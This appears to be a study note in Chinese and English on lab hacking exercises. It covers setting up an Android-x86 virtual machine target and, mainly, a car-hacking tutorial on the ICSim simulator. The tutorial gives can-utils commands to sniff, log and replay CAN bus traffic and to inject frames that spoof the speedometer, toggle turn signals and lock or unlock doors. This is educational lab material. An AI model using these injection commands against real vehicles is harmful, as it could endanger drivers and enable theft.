WEB HACKING
练习靶场:metasploitable2
入侵移动设备
靶场地址:
Android x86 Virtual Machine images for VMware and VirtualBox (osboxes.org)
https://www.osboxes.org/android-x86/
Download Android-x86 latest release (fosshub.com)https://www.fosshub.com/Android-x86.html
未能下载voa的,只能从镜像问年安装,过程很简单,但是安装后进入字符界面需要做以下工作:
右键->设置->系统, 修改指点设备为PS/2鼠标
显示:显存设置为最大,并启用3D加速
网络:修改为桥接网卡(默认的NAT方式主机无法访问虚拟机)
在启动界面,选择“debug mode”
mount -o remount,rw /mntvi /etc/grub/menu.lst移动光标“ quiet ”参数替换为“ nomodeset xforcevesa ”输入以下参数: nomodeset xforcevesa root=/dev/ram0保存,重启具体如图:
CAR HACKING AND THE INTERNET OF THINGS
(汽车黑客和物联网)
Installing the Car-Hacking Software
a software package called Instrument Cluster Simulator (ICSim)
kali@kali:~$ sudo apt update安装依赖
kali@kali:~$ sudo apt install libsdl2-dev libsdl2-image-dev can-utils安装ICSim:
kali@kali:~$ cd ~
kali@kali:~$ git clone https://github.com/zombieCraig/ICSim.git Set up can-utils on your machine:
kali@kali:~$ cd ~
kali@kali:~$ git clone https://github.com/linux-can/can-utils
kali@kali:~$ cd can-utils
kali@kali:~/can-utils$ make
kali@kali:~/can-utils$ sudo make installSet up the ICSim dashboard simulator software with these commands:
kali@kali:~/can-utils$ cp lib.o ~/ICSim
kali@kali:~/can-utils$ cd ~/ICSim
kali@kali:~/ICSim$ make clean
kali@kali:~/ICSim$ make
准备虚拟CAN总线网络
注意所在目录下运行下列命令:
#To set up the VCAN, enter this command at the terminal inside the ICSim folder:
kali@kali:~/ICSim$ sh setup_vcan.sh#Ensure that VCAN was set up correctly by entering ip addr in a terminal. You should see your IP address along with a new network named vcan0.#Enter the following in the terminal to tell it to first run ICSim using the vcan0 network we just created and then wait for our commands:kali@kali:~/ICSim$ ./icsim vcan0 &#Start the controller app on vcan0:
kali@kali:~/ICSim$ ./controls vcan0 &Right-click the top bar of the Control Panel window and select Always on Top
Hacking the bar
思路:抓包,修改包,重发
查看数据包
kali@kali:~/ICSim$cansniffer -c vcan0查看数据包,并写入日志
kali@kali:~/ICSim$ candump -l vcan0ctrl-C结束,日志存在当前目录candump-2022-02-19_031830.log
Replaying Packets
kali@kali:~/ICSim$ canplayer -I candump-YYYY-MM-DD_time.log
Sending New Commands(244#:speed,188#turn )
For example, sending the message 02000000 to ID# 188 turns on the right turn signal. Let’s try it out!
kali@kali:~/ICSim$ cansend vcan0 188#02000000If you want to turn on the left signal instead, send this message:
kali@kali:~/ICSim$ cansend vcan0 188#01000000#To turn off the signals, send the message 188#00000000. Or use this command to turn on both signals at the same time:kali@kali:~/ICSim$ cansend vcan0 188#03000000#Now take a look at the data values in CAN packets related to the speedometer (ID# 244) in your candump logfile. It looks like the last four hexadecimal digits go up as the speed increases. The data value 0000000000 is 0 miles per hour, and 0000003894 corresponds to about 90 miles per hour. Let’s see what the value 0000009999 would do:kali@kali:~/ICSim$ cansend vcan0 244#0000009999#Similarly, we can lock all the doors by sending the message 19B#00000F000000 and unlock all the doors with the message 19B#000000000000 (that’s 12 zeros after the hash mark):kali@kali:~/ICSim$ cansend vcan0 19B#00000F000000
kali@kali:~/ICSim$ cansend vcan0 19B#000000000000
